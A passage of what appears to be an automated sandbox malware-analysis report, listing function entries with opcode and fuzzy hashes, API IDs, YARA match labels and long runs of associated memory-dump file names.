                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F115E77AC118243E604862DC8BC6B7A795EBC5371BACC377C0494B744DA22D543B503
                                                                                                                                                                                                                                                  Function 0507050F Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1762326460.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5070000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7b86573fc61ce481d82825017d9da7fd332738381a9472214a916204181a0812
                                                                                                                                                                                                                                                  • Instruction ID: 00a38877cb7be8114f194564b4c6eeb9a054354adfbefb9acdf8b4711a25f700
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b86573fc61ce481d82825017d9da7fd332738381a9472214a916204181a0812
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9E0DFE7208609ADB642DF95A6684FE7B68E6816303348A35F041C6103E2A589490BA4
                                                                                                                                                                                                                                                  Function 00F6A302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                                  • Instruction ID: ccf19c0768b63bde42b193f93d993bea209b2ff2c0e8ebb19c6fe3126b45d031
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90E08C32921228EBCB15DB98CA0598AF3FCEB49B10B650096F501E3251C374DE00DBD0
                                                                                                                                                                                                                                                  Function 00F32EC0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 272threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                                  • String ID: bZ+,
                                                                                                                                                                                                                                                  • API String ID: 57040152-2515065464
                                                                                                                                                                                                                                                  • Opcode ID: 63b5feb69747d4dfb24cb7d4cf264c40ed869b75fe9477f32093ec39e34078ba
                                                                                                                                                                                                                                                  • Instruction ID: 3089a5aec9e6a53e9c6edacf01078283c59a47b3d893d3a4e1a7824c5b79c9ed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63b5feb69747d4dfb24cb7d4cf264c40ed869b75fe9477f32093ec39e34078ba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66A1DFB1E01205AFDB24EF64CD4476ABBA8FF15334F048169E816D7241EB79EA04EBD1
                                                                                                                                                                                                                                                  Function 00F4BB72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                  • String ID: bZ+,
                                                                                                                                                                                                                                                  • API String ID: 531285432-2515065464
                                                                                                                                                                                                                                                  • Opcode ID: dc4fa01a7bd77237d454399baa41bf09f719295e39e4dd52fd49e4ba11d7ee21
                                                                                                                                                                                                                                                  • Instruction ID: a21de586506f67550394c0ba6fefc9a77e5b47f3cb337d253ae384483fc69e50
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc4fa01a7bd77237d454399baa41bf09f719295e39e4dd52fd49e4ba11d7ee21
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5214F71E01119AFDF40EFA4DC819BEBBB9EF08720F114415FA05A7261DB389D05ABA0
                                                                                                                                                                                                                                                  Function 00F74C14 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
